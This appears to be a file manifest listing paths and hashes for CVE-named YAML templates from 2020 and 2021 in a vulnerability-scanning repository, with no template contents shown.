+http/cves/2020/CVE-2020-15148.yaml:825ee4b6760d0385c848402684b5251aa4f637d8 +http/cves/2020/CVE-2020-15227.yaml:d3eb1874c3e025809b7933bb28e7626143ced2c8 +http/cves/2020/CVE-2020-15500.yaml:0c5176b8ab27faf592c2b3d367e6f64c890ffc72 +http/cves/2020/CVE-2020-15505.yaml:53010995c11eeac2457bd3c18f23bfe2ebb292c7 +http/cves/2020/CVE-2020-15568.yaml:28062eb18c8cddcb01953424dcfff4a25a13bd9b +http/cves/2020/CVE-2020-15867.yaml:9d9f19bad25879ad45ef2527834e78df403f705b +http/cves/2020/CVE-2020-15895.yaml:e013c04c0a595a9809e711cfcddccf64801421d9 +http/cves/2020/CVE-2020-15920.yaml:fff2a0e88b42a5f4d1afc63243fc716e007c7b91 +http/cves/2020/CVE-2020-16139.yaml:d1183fc5450af3177e73838afb1562929998cb62 +http/cves/2020/CVE-2020-16846.yaml:3c5136f03ba363def87c9b56330c07344e5d442c +http/cves/2020/CVE-2020-16952.yaml:c85c958798befdbb0d20f26ab3970487b16b3fba +http/cves/2020/CVE-2020-17362.yaml:661c4d855ced562fa8ae63a59bdb39432999321e +http/cves/2020/CVE-2020-17453.yaml:29061625eb2da605edc7efdcacc09fabe0bf8ba1 +http/cves/2020/CVE-2020-17456.yaml:001ebc8bc3ba0a8953a7cc886745aa96542cf3bb +http/cves/2020/CVE-2020-17463.yaml:833d09618f18a01d82fa08b0dc8488f9d796aadf +http/cves/2020/CVE-2020-17496.yaml:abbc43d50714ebd6c3efca5f6cf43cf9c53b5332 +http/cves/2020/CVE-2020-17505.yaml:ab6ee5d66a156c73a4f1ea63fe152f7e41195f27 +http/cves/2020/CVE-2020-17506.yaml:a016c61442f492f8fc2bfbf6a49b8ec186dc989f +http/cves/2020/CVE-2020-17518.yaml:6082550e00f85615221e4b2ad6f01d76f5ce5e49 +http/cves/2020/CVE-2020-17519.yaml:547b31f15499c61114db144606bb26e4b5000762 +http/cves/2020/CVE-2020-17526.yaml:cf32eb6759513f16d02d71cad554aaced387a940 +http/cves/2020/CVE-2020-17530.yaml:0a287d297518276baf1ae2aa9a4d8e94d0ea1b31 +http/cves/2020/CVE-2020-18268.yaml:e3313bc56e1ce1c0cc37cf96a13aeacfca099900 +http/cves/2020/CVE-2020-19282.yaml:0bbf71896783835162d5c3b870bec4ea072ad9f9 +http/cves/2020/CVE-2020-19283.yaml:f84619638fdbb9d456607fae45d36c28072f9072 +http/cves/2020/CVE-2020-19295.yaml:6af6a290c2c3443caf3f84e87c759c883c917e20 +http/cves/2020/CVE-2020-19360.yaml:b785a7730e6b7e99ded33adcfeaf200a7c1f1dbd +http/cves/2020/CVE-2020-1943.yaml:ccd47b76d0e2a9de7ec21682bc9976a395e6c25c +http/cves/2020/CVE-2020-19515.yaml:088643a94915342e1b99be7957e544db98d4a79f +http/cves/2020/CVE-2020-1956.yaml:5355ff5655ed3802076c53c4ff98628d986e133f +http/cves/2020/CVE-2020-19625.yaml:096c1d1095c3be4a30e96ba09dea350879cddc5c +http/cves/2020/CVE-2020-20285.yaml:9be7423a952a1cd382fbd5be86c002c7215b11af +http/cves/2020/CVE-2020-20300.yaml:cfc634dbf1b4f07d7c4e3a30e65869f9d510a7c8 +http/cves/2020/CVE-2020-2036.yaml:5c0cc0bb65b16116ca6bbc04a5a5b0b49be0f8a2 +http/cves/2020/CVE-2020-2096.yaml:d56e0f4307eb257298bdbebc3fabf0ea36efca6e +http/cves/2020/CVE-2020-20982.yaml:042c94bb8ff507dedf6f0578607d17e57bf6e327 +http/cves/2020/CVE-2020-20988.yaml:d9174dd296656b9c3655dd417b3d3a17a58bc32b +http/cves/2020/CVE-2020-21012.yaml:722058f64e81fc759dbfba18135428b8d4478b41 +http/cves/2020/CVE-2020-2103.yaml:703b08b89525de3c4ce45a89c7275385200f94cd +http/cves/2020/CVE-2020-21224.yaml:3397872e0b93c08f229c75d0c3d0ec60e2322b93 +http/cves/2020/CVE-2020-2140.yaml:29c9a5a8fb779f900b039985f6dff7cd825ec2b6 +http/cves/2020/CVE-2020-22208.yaml:647c451be3fb4a4fdf0d219dc7b4a127e792aea8 +http/cves/2020/CVE-2020-22209.yaml:a57b0c2e6133cf3c0fb2274497de4add2c5a6092 +http/cves/2020/CVE-2020-22210.yaml:2c270d6d6ea46a49e240bf6a8a851cd03a6ad8cc +http/cves/2020/CVE-2020-22211.yaml:f036a0d02dcda5d8e5e9ffb6398a8d2d5c1eb55e +http/cves/2020/CVE-2020-22840.yaml:880050957bf733f51c102de51a13cf76f4513756 +http/cves/2020/CVE-2020-23015.yaml:8b8d53171311f122525b7a7ea2fcf81fb502e772 +http/cves/2020/CVE-2020-23517.yaml:03120133d2bfa6c76c4fdb2ba5e5fc9b39d38d93 +http/cves/2020/CVE-2020-23575.yaml:8d4ba0835606ecf7b8d19ea76cdfbb756d76e163 +http/cves/2020/CVE-2020-23697.yaml:b5806e9f77bf2b540f3fd26ddc1e687329df7fda +http/cves/2020/CVE-2020-23972.yaml:4fbb2a9faca6da690937f23e37ac7b620e7f6b5c +http/cves/2020/CVE-2020-24148.yaml:f90fbf89c48915df5f3bd1d77ddc33c909ca133b +http/cves/2020/CVE-2020-24186.yaml:caa1860c144db1ce5bf38eda4d1cb6dbacc8f834 +http/cves/2020/CVE-2020-24223.yaml:f6ac12aea952b6ef5ef924ceea740142e03bef6c +http/cves/2020/CVE-2020-24312.yaml:ce1433067f1d6009e0f85da4e808e1c5d3316402 +http/cves/2020/CVE-2020-24391.yaml:445c07f71bf713e52e7f85f54752e764b3e25e23 +http/cves/2020/CVE-2020-24550.yaml:a8da90991d0887f882f8b14df70e202e7b0fcbab +http/cves/2020/CVE-2020-24571.yaml:0118e1dd4530bb1e39943f6df22f9065481ce22b +http/cves/2020/CVE-2020-24579.yaml:3a3b07be06b15b312cbe0de268687ce02a6463ff +http/cves/2020/CVE-2020-24589.yaml:c6d009647063ac98d8079cadefd8bbd16899e933 +http/cves/2020/CVE-2020-24902.yaml:128d1267827bf9295e9ef574ebb38be055dc9a19 +http/cves/2020/CVE-2020-24903.yaml:301d2f2287b7ef9ccb93094bd5dfd0698f4c2823 +http/cves/2020/CVE-2020-24912.yaml:dad65e34035d6bdc11aae16f8161752956acc52f +http/cves/2020/CVE-2020-24949.yaml:5db1b16d215f2649eb61d91b729649924c8a2313 +http/cves/2020/CVE-2020-25078.yaml:5e06d51f5a8c74e4aa440dc62f7a7635ff2674fd +http/cves/2020/CVE-2020-25213.yaml:8db030bedff6520d5a5225de8cb7380b04708c88 +http/cves/2020/CVE-2020-25223.yaml:3403b01af07c0456c23721d3fe2408a6306f00bf +http/cves/2020/CVE-2020-25495.yaml:59a5eee7493e66cae3ea4e0f7a7f1410b62c1afe +http/cves/2020/CVE-2020-25506.yaml:95105e2531f5e4c08e4fa092aab2d1cec9bd3c80 +http/cves/2020/CVE-2020-2551.yaml:f5ee797b7bc4b523d1bdf623fad43436b6978ae5 +http/cves/2020/CVE-2020-25540.yaml:9a42f8779c920e732e19a25976b520ae6684ea80 +http/cves/2020/CVE-2020-25780.yaml:17fba9a6d2fbe70bc427b4f2a28a8d9a7decb097 +http/cves/2020/CVE-2020-25864.yaml:cf7671d66f4d0c6d1dd73f829f052838170107f4 +http/cves/2020/CVE-2020-26073.yaml:c7dee97dbdbb81161479352fc5bb0e812e36ceca +http/cves/2020/CVE-2020-26153.yaml:5b0c22638ffe7dc3b36d69167821153fef018c28 +http/cves/2020/CVE-2020-26214.yaml:6675cf16350415e293a5ad957f5c82293df48056 +http/cves/2020/CVE-2020-26217.yaml:95070c24d79fa7383fa05a8f319dce1d620dc571 +http/cves/2020/CVE-2020-26248.yaml:1971bb184651869e978dd7653d4c3735a636d09a +http/cves/2020/CVE-2020-26258.yaml:4a2d1a14951c894f9f732ba2ba9cdb141e293c4f +http/cves/2020/CVE-2020-26413.yaml:e69806f710499ab6487b51535b17ce59bc67f5f2 +http/cves/2020/CVE-2020-26876.yaml:1eab282fd663f98b9baf1306446ac17780eacdab +http/cves/2020/CVE-2020-26919.yaml:329745dc0590209692a05c1d74bb2345d4e94295 +http/cves/2020/CVE-2020-26948.yaml:ecc6e4c3c927450f70f2f359fd2d5199e9def78b +http/cves/2020/CVE-2020-27191.yaml:11d02073bb8a0ae0cb07f14d463d8aff75ff052a +http/cves/2020/CVE-2020-2733.yaml:f21943be274dd33f72c7525fba878832c76b21be +http/cves/2020/CVE-2020-27361.yaml:d80352eb59496b9e6b6ca4a1403f2a3fe89f55ae +http/cves/2020/CVE-2020-27467.yaml:b5f73f18dc313bf61ff097d56efdbce7be89c924 +http/cves/2020/CVE-2020-27481.yaml:8b63ff541a623e86302e4a60e7d65fa57509ff9d +http/cves/2020/CVE-2020-27735.yaml:9bf49e360d6da7e49c5f9ed6ed0d640575e11ceb +http/cves/2020/CVE-2020-27866.yaml:d821bf372193e43e324e21f245748bf3b5062d15 +http/cves/2020/CVE-2020-27982.yaml:707afaf8be131f71ed20e725d34f3e28a0942959 +http/cves/2020/CVE-2020-27986.yaml:c2f2493f2d309396e4d0eb98e4180971d2bc8768 +http/cves/2020/CVE-2020-28185.yaml:b03775fb89b2f18589dc8335868b9a9332924b74 +http/cves/2020/CVE-2020-28188.yaml:476fa4071b05137a03826d624c47a7e467d9b782 +http/cves/2020/CVE-2020-28208.yaml:2cbd9b41a7015a34e08bfba13a3ef7db068bf775 +http/cves/2020/CVE-2020-28351.yaml:38f0f382ce148c1afdf4a0ed292df319c52b0c1a +http/cves/2020/CVE-2020-28871.yaml:e40d9c22d9d95deef1c361a5e4d64bae78593f4f +http/cves/2020/CVE-2020-28976.yaml:8d8c5ff358b90dcd1172c2d097bd558766486e84 +http/cves/2020/CVE-2020-29164.yaml:e4265796fdab1d55f24bb5ef5eb8e39bc7e6ddcd +http/cves/2020/CVE-2020-29227.yaml:973177ff051e6cd90f651379b652395a15a90fc8 +http/cves/2020/CVE-2020-29284.yaml:38c8d79acbda493d178c01c2673ae1d9bbbad097 +http/cves/2020/CVE-2020-29395.yaml:aae7701d946d1d6a195f4bb2fe00912bb16e7dfb +http/cves/2020/CVE-2020-29453.yaml:1fe9b7aeb15f2352bf57983e1ca1076ae7424e11 +http/cves/2020/CVE-2020-29583.yaml:8b4707b7821e6406428b0f28cd4da4b86000bbfa +http/cves/2020/CVE-2020-29597.yaml:d01bf11a1afe72a8640a900ba696875d2341e8dd +http/cves/2020/CVE-2020-3187.yaml:806342c9e1d4bdbd6f5a5114d8294468a89d93c3 +http/cves/2020/CVE-2020-3452.yaml:f44e3f1bd918bea6354617f4479faa60a11aa8eb +http/cves/2020/CVE-2020-35234.yaml:e2f568655ccca1a7b450c182d078a36afefd03be +http/cves/2020/CVE-2020-35338.yaml:dd000d0910724d1959baf78513b09f93c1cc52ed +http/cves/2020/CVE-2020-35476.yaml:f6e77fb44947f37a0d3ce2203aa02798b85c0ce4 +http/cves/2020/CVE-2020-35489.yaml:ed51a82105cc7810f37eed62a6f18cc8a09fb16e +http/cves/2020/CVE-2020-35580.yaml:9b69698a86ca8c11c1f90e1ed1d7194e03fafe47 +http/cves/2020/CVE-2020-35598.yaml:1c77ad39e1c9776fc4a937e6b313e84454a4abc7 +http/cves/2020/CVE-2020-35713.yaml:52d7a8f19af0f5377a295c6ad3cb687ac94ce0e3 +http/cves/2020/CVE-2020-35729.yaml:9553875b41f6fa6356c0bbeff230acd178ce3995 +http/cves/2020/CVE-2020-35736.yaml:6879d1d9e518b84f563ad00bc136df5055b80426 +http/cves/2020/CVE-2020-35749.yaml:41218467efddd0f6ee14f0dfee60e7154c7803a0 +http/cves/2020/CVE-2020-35774.yaml:063f113e58f81023d2b37fb11c8e2faad4f068dd +http/cves/2020/CVE-2020-3580.yaml:dc748d899584c3b2bbb4494aa6c8fb121fc6cf58 +http/cves/2020/CVE-2020-35846.yaml:771d25d14071b9863cdd527d7f1d13b00cbd921c +http/cves/2020/CVE-2020-35847.yaml:faf8346a331fdf14f94d7e8054c96fb9ef344391 +http/cves/2020/CVE-2020-35848.yaml:05672e953fba9a836b4f78063855e4644cf34184 +http/cves/2020/CVE-2020-35951.yaml:fbd75c70436d88a4d4c9070ba597702aa0f5e378 +http/cves/2020/CVE-2020-35984.yaml:e42baeb310b0bb23f0db72ad05c22afbb08a8117 +http/cves/2020/CVE-2020-35985.yaml:f44b22ce4d8254afeef5ce116840b21863efdf55 +http/cves/2020/CVE-2020-35986.yaml:ae06b0e39680993542ff2d34fee2260a65811897 +http/cves/2020/CVE-2020-35987.yaml:c093571f1299c16e2d53cb93462ddbecae813f26 +http/cves/2020/CVE-2020-36112.yaml:bfd0496e5da3de27d4519eba9cb9ade0dda71f11 +http/cves/2020/CVE-2020-36289.yaml:1f07bc423448701555016da90e1a5e7ce94f2435 +http/cves/2020/CVE-2020-36365.yaml:1837dea8337f73a71ae2dc8aac2ab1122007d277 +http/cves/2020/CVE-2020-36510.yaml:1f2fe8922171b336cafc8bbd7c40ea6b83252048 +http/cves/2020/CVE-2020-4463.yaml:0065ec8a3fa62dadaef319ec980d908aa74e26ad +http/cves/2020/CVE-2020-5191.yaml:4a1e7792142b63f85905970019a88b18ef1ece58 +http/cves/2020/CVE-2020-5192.yaml:d1a8a2e7a6f84845ddd86cbf1882f7aefc7f604e +http/cves/2020/CVE-2020-5284.yaml:b727c929887591b98db152ef5ec0e1a312667b8a +http/cves/2020/CVE-2020-5307.yaml:d45df145f68c1a84c9b304eda6c069dce3136c9b +http/cves/2020/CVE-2020-5405.yaml:a0dc028acc95974b83bfae73c937f0976ec1149e +http/cves/2020/CVE-2020-5410.yaml:ddbc1db6063d7f545371cc6908e50e8a355c6c35 +http/cves/2020/CVE-2020-5412.yaml:79667f59bc7893a317e567f6b18b8df1de19b203 +http/cves/2020/CVE-2020-5775.yaml:33cb0cf75fe29edb61917d1f8aef76cf942ccda7 +http/cves/2020/CVE-2020-5776.yaml:a5ff5baa23cb6e6000a7eed97dfca42ae4335bb5 +http/cves/2020/CVE-2020-5777.yaml:cddf058766b4027d12391feed8db39d1f196cda2 +http/cves/2020/CVE-2020-5847.yaml:524ba0cd754fd45bc1ab08bd83ac315793be49b7 +http/cves/2020/CVE-2020-5902.yaml:3725cf8751eed1af1fc64fc8cdab16ab061c874f +http/cves/2020/CVE-2020-6171.yaml:a6fcde1d37af2825f8feeab547a2c392b5ca13be +http/cves/2020/CVE-2020-6207.yaml:c5286c3feab980f52d7623436fd2760d7c067ebb +http/cves/2020/CVE-2020-6287.yaml:06f99e30822ab520958648e638b82f2dfe81d5d4 +http/cves/2020/CVE-2020-6308.yaml:9a4e6be42036e011b59a0085ed5887e5258049cf +http/cves/2020/CVE-2020-6637.yaml:bc74ce59640c522ba48fe4bb5b60b1b79e022d5c +http/cves/2020/CVE-2020-7107.yaml:b6793a6ec9fdebce1553be519da2aaa197192ff6 +http/cves/2020/CVE-2020-7136.yaml:774f99eeef37701228b21c1d514214a5520c117f +http/cves/2020/CVE-2020-7209.yaml:3235bf2ebe4320dd4a17d3f161c628ba63b97029 +http/cves/2020/CVE-2020-7318.yaml:59b85a658c5b4be43a352a8e1fa97651175bd5e9 +http/cves/2020/CVE-2020-7796.yaml:5d963c37a253e26b57b1730e57e5333388794f34 +http/cves/2020/CVE-2020-7943.yaml:cf526799fa85232f0665eb04639b33562caec9bf +http/cves/2020/CVE-2020-7961.yaml:b9a6c1350bfac1a241e98c5677dfff11be0fdda9 +http/cves/2020/CVE-2020-7980.yaml:c0a3981f38dc1107f4f8bdb1fbf1a888ef776607 +http/cves/2020/CVE-2020-8115.yaml:23befc62e85e89c41d518c6edf6040f192ff5c78 +http/cves/2020/CVE-2020-8163.yaml:42d0772c68748aa38e470fcf08e43b42211662eb +http/cves/2020/CVE-2020-8191.yaml:c3160c00f686ce35d578d9ea5c1758940a0508d4 +http/cves/2020/CVE-2020-8193.yaml:f60288e6ad15e98a8e138f4115cc45f2da29e498 +http/cves/2020/CVE-2020-8194.yaml:2f232f69d05d2e2c3674239cc27b54f8860eb1b7 +http/cves/2020/CVE-2020-8209.yaml:a10e35e459c6ab08cbeabcbd64c323a17bdd2314 +http/cves/2020/CVE-2020-8497.yaml:442a9c2cdaf81a4b40cb223c060e972650c2e452 +http/cves/2020/CVE-2020-8512.yaml:a2c980a1280fe91d27ffc86e39ca0eb6b5674a21 +http/cves/2020/CVE-2020-8515.yaml:c126b6f71f17b7655bf6d9dcf308c9c75bdfb4a6 +http/cves/2020/CVE-2020-8641.yaml:fd0dfeafc510c2fc822329c9253520bfa7eaa946 +http/cves/2020/CVE-2020-8644.yaml:0be530d0686ada9c900d34fd0c477834c0dc197c +http/cves/2020/CVE-2020-8654.yaml:b6b82854fe6fcbf30f2109f996b4bb317dbdc6d1 +http/cves/2020/CVE-2020-8771.yaml:50e2f708bac05e89b526106b6aee8bb6eba32500 +http/cves/2020/CVE-2020-8772.yaml:efa34803ef41d4daba18cf093989c2ccba795ec0 +http/cves/2020/CVE-2020-8813.yaml:fad28734823371d9f69c6534a50065cc867bec79 +http/cves/2020/CVE-2020-8982.yaml:07a5f448097e6df65c7ea317c301ac4d87a61ac2 +http/cves/2020/CVE-2020-9036.yaml:9ee13b1bd12eca8697adfaf736e7eeb71c82b59c +http/cves/2020/CVE-2020-9043.yaml:827964111446a6cd184d56857324f6be8cd9aa30 +http/cves/2020/CVE-2020-9047.yaml:7f7d34f8dd4412618f0bb3b886e813edabe87745 +http/cves/2020/CVE-2020-9054.yaml:3a2313114303baa34dc2d13010213bc343bd6246 +http/cves/2020/CVE-2020-9315.yaml:eac6e6e58dfcc74e21164d8ceb1a911dae50bcfa +http/cves/2020/CVE-2020-9344.yaml:6a19a54602ea57fc8959b2a8d1e553142c1cb4cf +http/cves/2020/CVE-2020-9376.yaml:6a3bc917ab184af3d4e1879ca348738323cc5880 +http/cves/2020/CVE-2020-9402.yaml:cdcf593943fbf0602d73eee650b1665a67f3a3ec +http/cves/2020/CVE-2020-9425.yaml:addb734ec1d9361393cb335e4031cd2bd58f286b +http/cves/2020/CVE-2020-9483.yaml:7da5d2ff7d87469be7b35c2934218c09d531c60c +http/cves/2020/CVE-2020-9484.yaml:4a7fd0a607bc033ba813c927c4eac809450c66c8 +http/cves/2020/CVE-2020-9496.yaml:204fa835b543322c6dec39a528d5ecd165eb6cd0 +http/cves/2020/CVE-2020-9757.yaml:c468b9d24f7e90e8edbd0d7a47e39021e2a9e060 +http/cves/2021/CVE-2021-1472.yaml:66006d16f28423c5b3359ddc99fd7a605e909fb1 +http/cves/2021/CVE-2021-1497.yaml:bafdd8ca8d9c9929bed582481e37556489af8d46 +http/cves/2021/CVE-2021-1498.yaml:ed9216fa8e233dcdd30f7f0bede126aad9da4767 +http/cves/2021/CVE-2021-1499.yaml:57272ea628cad645d67669fca071ff7070882dad +http/cves/2021/CVE-2021-20031.yaml:b25b97ac016b5f098f31584148744466cddeb604 +http/cves/2021/CVE-2021-20038.yaml:4d7cd97bd900a00964bd4c8af621557f2fe1e744 +http/cves/2021/CVE-2021-20090.yaml:d471154936a0966bd07dfe715be5f27ebb51d9c0 +http/cves/2021/CVE-2021-20091.yaml:00216e4805d9a65dd07cee2751a326304133db34 +http/cves/2021/CVE-2021-20092.yaml:3eaf50ca2e0230c299a71f1826157b5fc9ba95cc +http/cves/2021/CVE-2021-20114.yaml:e0d92c67afb0c1a7ac9fc416766ce5a211b310f4 +http/cves/2021/CVE-2021-20123.yaml:90be9621d82821b6c3a13d3f2234435ccb2640e0 +http/cves/2021/CVE-2021-20124.yaml:b75d780fb1c137f60a4d144ed301bf9a73fd9db7 +http/cves/2021/CVE-2021-20137.yaml:d0d4bf96ace062370d01421aee405bcb7cb6c8c6 +http/cves/2021/CVE-2021-20150.yaml:8523f53de1e9f76a6176ef4c0c4c5de83445d986 +http/cves/2021/CVE-2021-20158.yaml:76af022261866b9972abe44a97d0c5e91e5775b0 +http/cves/2021/CVE-2021-20167.yaml:6ee73d5bea87430ca979d7d4f4e98294cffed80c +http/cves/2021/CVE-2021-20323.yaml:3a74742c83783a1bfa352c1b213c8910df8c9949 +http/cves/2021/CVE-2021-20792.yaml:e8f36bbf5ab607f9bf9824f39c75a2e85fc364af +http/cves/2021/CVE-2021-20837.yaml:3b30a35dbf688cbcf92d488030a4ed7d3183a335 +http/cves/2021/CVE-2021-21087.yaml:1def5e9be05c2e816b71b8883e5d39b97c05128f +http/cves/2021/CVE-2021-21234.yaml:4503a609efa071208d2c5102b21a9aa1b8f66dbe +http/cves/2021/CVE-2021-21287.yaml:f8482f1c5a4234e24f8ca03fa23b57fb2f3feef0 +http/cves/2021/CVE-2021-21307.yaml:1968097513235bfaa88d8d94af32c1120feb4c6a +http/cves/2021/CVE-2021-21311.yaml:a3c099a7a7487aff008e10203646e2a17f6c013d +http/cves/2021/CVE-2021-21315.yaml:cd8291e4bc05fb754584e072356afc69e947f34f +http/cves/2021/CVE-2021-21345.yaml:d33a577ef991cbcf7a23dcd91e1aebf1fd8de5ef +http/cves/2021/CVE-2021-21351.yaml:500f324da3e09ecc9c586e1ca13e532e9aabfb70 +http/cves/2021/CVE-2021-21389.yaml:7032c41dcbc8667abbbb05042219cf177fa7943c +http/cves/2021/CVE-2021-21402.yaml:d5b7eb4a66b5e60485b5f58b965bb8fa5bdca23e +http/cves/2021/CVE-2021-21479.yaml:ee56f18a26b12fb18c71e09f77f819a22c8ae12f +http/cves/2021/CVE-2021-21745.yaml:ebd258252476f7e4c2409061fe81d2d8414ef07b +http/cves/2021/CVE-2021-21799.yaml:2348f99bf30550ae89c94c57697802692b713776 +http/cves/2021/CVE-2021-21800.yaml:964e8073a9d8679404043d1ca19c353deff3813c +http/cves/2021/CVE-2021-21801.yaml:b07ef81c0cb5b4e04a56da8935163f87492c9493 +http/cves/2021/CVE-2021-21802.yaml:abbbac6220a8220e66bdc59f6d166c3380542d70 +http/cves/2021/CVE-2021-21803.yaml:968b6712b909e73db5bce653fb46a202faac68d7 +http/cves/2021/CVE-2021-21805.yaml:0f8dd2477494f5675131f22bff11fb5e3571f4a4 +http/cves/2021/CVE-2021-21816.yaml:04387fb29b5266d014c9965ae2ac5ac05db1b22b +http/cves/2021/CVE-2021-21881.yaml:2aeb4042bd12d59679413db448085c8de49a5fa9 +http/cves/2021/CVE-2021-21972.yaml:f1158547f009d7980874b80eddf7244827832e58 +http/cves/2021/CVE-2021-21973.yaml:4f42b1e38a2e49669644c6de2ae5df82a4a41231 +http/cves/2021/CVE-2021-21975.yaml:43d064aaf646f84f940386c7a5b7b67216c4533b +http/cves/2021/CVE-2021-21978.yaml:a53dde06a13f4e01e7d1bc841b8a5e273fbe4614 +http/cves/2021/CVE-2021-21985.yaml:dd4f3c433486b5c23897295333cc114b14614944 +http/cves/2021/CVE-2021-22005.yaml:627be763cd216dd2d4fd8a5988ab11fee3967bcb +http/cves/2021/CVE-2021-22053.yaml:667a4d9a6f0818749f3c3070ef968e9120384573 +http/cves/2021/CVE-2021-22054.yaml:2dfe2938bdeea2d27d9ad5bb48fa02dab97724a8 +http/cves/2021/CVE-2021-22122.yaml:4027e54f97ce1df309539a1790a4de52f4ebe4d0 +http/cves/2021/CVE-2021-22145.yaml:d69a1286e966ecd3c4c4e752e43abafe02c23b4d +http/cves/2021/CVE-2021-22205.yaml:3f4565f940ce4a68e41644ea7107f56f716924c2 +http/cves/2021/CVE-2021-22214.yaml:3d97cffff5dfbfb9b95ccf89a1de884b8af146d6 +http/cves/2021/CVE-2021-22502.yaml:28bfced61c25d8359085a706dc8e3cbc5fbd1d01 +http/cves/2021/CVE-2021-22707.yaml:8192020eaa7b494234f95fe4f5b828b3ab702196 +http/cves/2021/CVE-2021-22873.yaml:875b09a2e9eae33e43a334a673c57dfeabe7ce52 +http/cves/2021/CVE-2021-22911.yaml:1f949ee40c294998e148ed6a8519193372565a05 +http/cves/2021/CVE-2021-22986.yaml:79f73f472aa75c94a810a18696171db178ab4a07 +http/cves/2021/CVE-2021-23241.yaml:b6414cbe27137380d939a1f4650751b31f2b5723 +http/cves/2021/CVE-2021-24145.yaml:1cc5a7025d4f9ce15791ec2f8bb9e1496e434f33 +http/cves/2021/CVE-2021-24146.yaml:8cbe7ac77c98bd6d0527f3e6af9ed8836adae522 +http/cves/2021/CVE-2021-24150.yaml:e25eaa1fd44cde79c98e726ae31edd6cb53a185e +http/cves/2021/CVE-2021-24155.yaml:df91b3c5a63a67208f2c78daa61aa6ad4fec8ddc +http/cves/2021/CVE-2021-24165.yaml:ccea976cea5f86ac02f488a7f3fb0b6646ceaa45 +http/cves/2021/CVE-2021-24169.yaml:3e4e2756ec1f991a82fe26322664858fcb7b23bb +http/cves/2021/CVE-2021-24176.yaml:8c77a8d189494b15f7600b1589f3c48919c8702c +http/cves/2021/CVE-2021-24210.yaml:412872c9021f9a7d0011073398ba1d8900e6b5d3 +http/cves/2021/CVE-2021-24214.yaml:0d1b0d5aeda6ed98e31242a10a50df1b9eed1390 +http/cves/2021/CVE-2021-24226.yaml:328ae4b82dfc1f3b7ca81f95425c78afa991d823 +http/cves/2021/CVE-2021-24227.yaml:116d6cd26cb625a63bc185d350ec18ee4d3a21cc +http/cves/2021/CVE-2021-24235.yaml:c0a03901a643a9695418a98c41668ce9c7d21774 +http/cves/2021/CVE-2021-24236.yaml:6acf0fcaa81bd63b690857c57350b9670997a7e7 +http/cves/2021/CVE-2021-24237.yaml:ce5ef2706fe30b1d7874cbcb43dad15f2d6a42d4 +http/cves/2021/CVE-2021-24239.yaml:52bd1a767402acc261bb9edc18b6d7bee80e9358 +http/cves/2021/CVE-2021-24245.yaml:4af2da402e55f4514355f15f49f0a05f041d76cc +http/cves/2021/CVE-2021-24274.yaml:204cd18acfb2eb741ef66a939d9395b74b5a3197 +http/cves/2021/CVE-2021-24275.yaml:bbd16c6ca8bec760cf4d80e7a1d07d576a602edd +http/cves/2021/CVE-2021-24276.yaml:74bb8e78d1f9e2c1edbd18160e74e9fd93632e31 +http/cves/2021/CVE-2021-24278.yaml:c2c84455f03d03c9ab01f141f2cc95450da8a4bd +http/cves/2021/CVE-2021-24284.yaml:e94d6999fc0ef45f2643a4f2a529d0b419dcd578 +http/cves/2021/CVE-2021-24285.yaml:ed7c8af7220a33a8279d69bdc9b14fdc44deeb78 +http/cves/2021/CVE-2021-24287.yaml:74d1fbaf2669634322003c57274707d44b076e18 +http/cves/2021/CVE-2021-24288.yaml:8be32234ef64148e64c8af920c628a77010de467 +http/cves/2021/CVE-2021-24291.yaml:2b84e8dada5ed4e6ecd843860f7ef5117e8e185f +http/cves/2021/CVE-2021-24298.yaml:49bef35d3e61509dfc19cd95c386f0654f463cc4 +http/cves/2021/CVE-2021-24300.yaml:f60d41fe06373326c8204ed7eb176adc5ed9bd6a +http/cves/2021/CVE-2021-24316.yaml:16b0b019899b6ca299753660875801397c64d1ba +http/cves/2021/CVE-2021-24320.yaml:76de6318bbe04755a97abbac25b092252c5f7635 +http/cves/2021/CVE-2021-24335.yaml:390f3011d2e0999edcc0d37b8179982f5983d364 +http/cves/2021/CVE-2021-24340.yaml:de5cd193a59cf5f51dd3d6c62bbd390338e89fd2 +http/cves/2021/CVE-2021-24342.yaml:023c948c19a149f98e065e890a7b87a49aeccfa8 +http/cves/2021/CVE-2021-24347.yaml:6954597ce49ff40367669acae3d800f1f929000c +http/cves/2021/CVE-2021-24351.yaml:472a95f1568e7ca1ef3356e97e8458915bbc5f91 +http/cves/2021/CVE-2021-24358.yaml:984491d41e9152ed8e0eac7a2ce7a9c4d1f9a9bd +http/cves/2021/CVE-2021-24364.yaml:e746339e47bca0f5a218cb81015d4c92450d53e7 +http/cves/2021/CVE-2021-24370.yaml:0eded19a9bdf35457c9f7a92e6c6799fea89256f +http/cves/2021/CVE-2021-24387.yaml:800da50616a1c0be255cc14e27d338387ceeb00d +http/cves/2021/CVE-2021-24389.yaml:c3fb2d48cdb87b764fdd9208b09551e0a8c1fed0 +http/cves/2021/CVE-2021-24406.yaml:6c2aacae28ae0d4c5d5dcf5c44c462fa01e82cb4 +http/cves/2021/CVE-2021-24407.yaml:48ae309acbd78d0eac91310fb0ea97c16781daae +http/cves/2021/CVE-2021-24409.yaml:321722f6d45119d7cba0bc3824ca41fc4f465fda +http/cves/2021/CVE-2021-24435.yaml:a7f0610e88c719223c41aeb02c0e5ba32dd807f0 +http/cves/2021/CVE-2021-24436.yaml:f0118915f861e1299fbdef37fb45ebaa317dd18b +http/cves/2021/CVE-2021-24452.yaml:06fb95582b1c8f9fee7ec3638e1582ca20e18e02 +http/cves/2021/CVE-2021-24472.yaml:293ad9d50badf3970756f8b1012913189c72cd88 +http/cves/2021/CVE-2021-24488.yaml:1924876bcfdfa5f41c6055f76003593eb0307e51 +http/cves/2021/CVE-2021-24495.yaml:7b07648675af3f35f7ee30144fe986d746f6116e +http/cves/2021/CVE-2021-24498.yaml:3ccba85cecc613a5219f2d518ef3affd0fb9a279 +http/cves/2021/CVE-2021-24499.yaml:0884ddc13612718096d5f1ec39dd0e6a0b5b9944 +http/cves/2021/CVE-2021-24510.yaml:2253159eb1154803cd7b68ba658482f069e5f80f +http/cves/2021/CVE-2021-24554.yaml:689be58706132b7af264101d856d14df99a27152 +http/cves/2021/CVE-2021-24647.yaml:b8dea64a544da7971b58afe4b6403ea214c223f3 +http/cves/2021/CVE-2021-24666.yaml:cd1b9f929c98c54bc89c688cff7eed676ea427ef +http/cves/2021/CVE-2021-24731.yaml:1fd89814e028410baa309fc375f267f7dec26b7f +http/cves/2021/CVE-2021-24746.yaml:4b079dc27cd8fe8fecfb5f05ee58fe9b36a7ca1f +http/cves/2021/CVE-2021-24750.yaml:17988fb41d2e8fa9543e5981337d58f6d7c08456 